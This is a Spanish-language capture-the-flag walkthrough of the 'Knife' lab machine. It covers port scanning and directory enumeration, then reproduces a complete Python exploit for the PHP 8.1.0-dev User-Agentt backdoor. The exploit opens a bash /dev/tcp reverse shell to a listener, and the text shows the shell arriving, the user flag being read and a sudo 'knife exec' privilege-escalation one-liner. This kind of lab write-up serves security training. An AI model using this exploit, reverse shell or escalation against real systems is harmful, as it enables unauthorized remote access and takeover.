//
❯ nmap -p- --open -sS -T4 -n -Pn 10.10.10.242 -oN First_Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:29 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 93.95% done; ETC: 19:30 (0:00:03 remaining)
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Ahora hacemos un escaneo con Scripts y versiones en los puertos abiertos:
//
❯ nmap -p80,22 -sVC -sS -T4 -n -Pn 10.10.10.242 -oN sVC_Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-14 19:32 EDT
Nmap scan report for 10.10.10.242
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e
22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Revisamos que corre por el puerto 80:
Vemos que es un servidor apache que usa codigo PHP 8.1.0-dev.
Enumeramos subdominos con Gobuster pero no conseguimos nada:
//
❯ gobuster dir -u "http://10.10.10.242/" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url: http://10.10.10.242/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
Starting gobuster in directory enumeration mode
Buscamos exploits para PHP 8.1.0-DEV Y conseguimos uno en particular, revisando el perfil de desarrollador, encontramos en su github un archivo python que permite obtener una revshell directamente asi que tambien lo descargamos:
//
Exploit Title: PHP 8.1.0-dev Backdoor Remote Code Execution
Date: 23 may 2021
Exploit Author: flast101
Vendor Homepage: https://www.php.net/
Software Link:
- https://hub.docker.com/r/phpdaily/php
- https://github.com/phpdaily/php
Version: 8.1.0-dev
Tested on: Ubuntu 20.04
CVE : N/A
References:
- https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
- https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
Usage:
python3 revshell_php_8.1.0-dev.py
"""
#!/usr/bin/env python3
import os, sys, argparse, requests
request = requests.Session()
def check_target(args):
response = request.get(args.url)
for header in response.headers.items():
if "PHP/8.1.0-dev" in header[1]:
return True
return False
def reverse_shell(args):
payload = 'bash -c "bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1"'
injection = request.get(args.url, headers={"User-Agentt": "zerodiumsystem('" + payload + "');"}, allow_redirects = False)
def main():
parser = argparse.ArgumentParser(description="Get a reverse shell from PHP 8.1.0-dev backdoor. Set up a netcat listener in another shell: nc -nlvp ")
parser.add_argument("url", metavar='', help="Target URL")
parser.add_argument("lhost", metavar='', help="Attacker listening IP",)
parser.add_argument("lport", metavar='', help="Attacker listening port")
args = parser.parse_args()
if check_target(args):
reverse_shell(args)
else:
print("Host is not available or vulnerable, aborting...")
exit
if name == "main":
main()
Ejecutamos el Script y nos ponemos en escucha:
//
❯ python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.51 443
❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.51] from (UNKNOWN) [10.10.10.242] 42898
bash: cannot set terminal process group (989): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
Obtuvimos la reverse Shell, estamos dentro, ahora conseguimos la primera flag:
//
james@knife:/$ cd /home
james@knife:/home$ cd james
james@knife:~$ cat user.txt
bfdda457427a526151f71c62184a9321
Intentaremos escalar privilegios primero listando el id y los permisos como administrador:
//
james@knife:~$ id
uid=1000(james) gid=1000(james) groups=1000(james)
james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
Vemos que pudemos ejecutar el comando /usr/bin/knife , Este binario es vulnerable a la injeccion de una consola interactiva a traves de one liner "sudo knife exec -E 'exec "/bin/sh"', asi que lo ejecutaremos:
